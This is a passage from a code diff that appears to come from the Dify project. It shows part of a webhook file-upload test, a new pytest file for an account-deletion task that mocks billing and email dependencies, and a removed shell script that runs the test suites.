headers={"Content-Type": "multipart/form-data"},
data={"message": "test", "upload": file_storage},
data={"message": "test", "file": file_storage},
):
webhook_trigger = MagicMock()
webhook_trigger.tenant_id = "test_tenant"
with patch.object(WebhookService, "_process_file_uploads") as mock_process_files:
mock_process_files.return_value = {"upload": "mocked_file_obj"}
mock_process_files.return_value = {"file": "mocked_file_obj"}
webhook_data = WebhookService.extract_webhook_data(webhook_trigger)
assert webhook_data["method"] == "POST"
assert webhook_data["body"]["message"] == "test"
assert webhook_data["files"]["upload"] == "mocked_file_obj"
assert webhook_data["files"]["file"] == "mocked_file_obj"
mock_process_files.assert_called_once()
def test_extract_webhook_data_raw_text(self):

File diff suppressed because it is too large

View File

@ -0,0 +1,112 @@
"""
Unit tests for delete_account_task.
Covers:
- Billing enabled with existing account: calls billing and sends success email
- Billing disabled with existing account: skips billing, sends success email
- Account not found: still calls billing when enabled, does not send email
- Billing deletion raises: logs and re-raises, no email
"""
from types import SimpleNamespace
from unittest.mock import MagicMock, patch
import pytest
from tasks.delete_account_task import delete_account_task
@pytest.fixture
def mock_db_session():
"""Mock the db.session used in delete_account_task."""
with patch("tasks.delete_account_task.db.session") as mock_session:
mock_query = MagicMock()
mock_session.query.return_value = mock_query
mock_query.where.return_value = mock_query
yield mock_session
@pytest.fixture
def mock_deps():
"""Patch external dependencies: BillingService and send_deletion_success_task."""
with (
patch("tasks.delete_account_task.BillingService") as mock_billing,
patch("tasks.delete_account_task.send_deletion_success_task") as mock_mail_task,
):
# ensure .delay exists on the mail task
mock_mail_task.delay = MagicMock()
yield {
"billing": mock_billing,
"mail_task": mock_mail_task,
}
def _set_account_found(mock_db_session, email: str = "user@example.com"):
account = SimpleNamespace(email=email)
mock_db_session.query.return_value.where.return_value.first.return_value = account
return account
def _set_account_missing(mock_db_session):
mock_db_session.query.return_value.where.return_value.first.return_value = None
class TestDeleteAccountTask:
def test_billing_enabled_account_exists_calls_billing_and_sends_email(self, mock_db_session, mock_deps):
# Arrange
account_id = "acc-123"
account = _set_account_found(mock_db_session, email="a@b.com")
# Enable billing
with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True):
# Act
delete_account_task(account_id)
# Assert
mock_deps["billing"].delete_account.assert_called_once_with(account_id)
mock_deps["mail_task"].delay.assert_called_once_with(account.email)
def test_billing_disabled_account_exists_sends_email_only(self, mock_db_session, mock_deps):
# Arrange
account_id = "acc-456"
account = _set_account_found(mock_db_session, email="x@y.com")
# Disable billing
with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", False):
# Act
delete_account_task(account_id)
# Assert
mock_deps["billing"].delete_account.assert_not_called()
mock_deps["mail_task"].delay.assert_called_once_with(account.email)
def test_account_not_found_billing_enabled_calls_billing_no_email(self, mock_db_session, mock_deps, caplog):
# Arrange
account_id = "missing-id"
_set_account_missing(mock_db_session)
# Enable billing
with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True):
# Act
delete_account_task(account_id)
# Assert
mock_deps["billing"].delete_account.assert_called_once_with(account_id)
mock_deps["mail_task"].delay.assert_not_called()
# Optional: verify log contains not found message
assert any("not found" in rec.getMessage().lower() for rec in caplog.records)
def test_billing_delete_raises_propagates_and_no_email(self, mock_db_session, mock_deps):
# Arrange
account_id = "acc-err"
_set_account_found(mock_db_session, email="err@ex.com")
mock_deps["billing"].delete_account.side_effect = RuntimeError("billing down")
# Enable billing
with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True):
# Act & Assert
with pytest.raises(RuntimeError):
delete_account_task(account_id)
# Ensure email was not sent
mock_deps["mail_task"].delay.assert_not_called()

File diff suppressed because it is too large

View File

@ -1,20 +0,0 @@
#!/bin/bash
set -x
SCRIPT_DIR="$(dirname "$(realpath "$0")")"
cd "$SCRIPT_DIR/../.."
# ModelRuntime
dev/pytest/pytest_model_runtime.sh
# Tools
dev/pytest/pytest_tools.sh
# Workflow
dev/pytest/pytest_workflow.sh
# Unit tests
dev/pytest/pytest_unit_tests.sh
# TestContainers tests
dev/pytest/pytest_testcontainers.sh

Some files were not shown because too many files have changed in this diff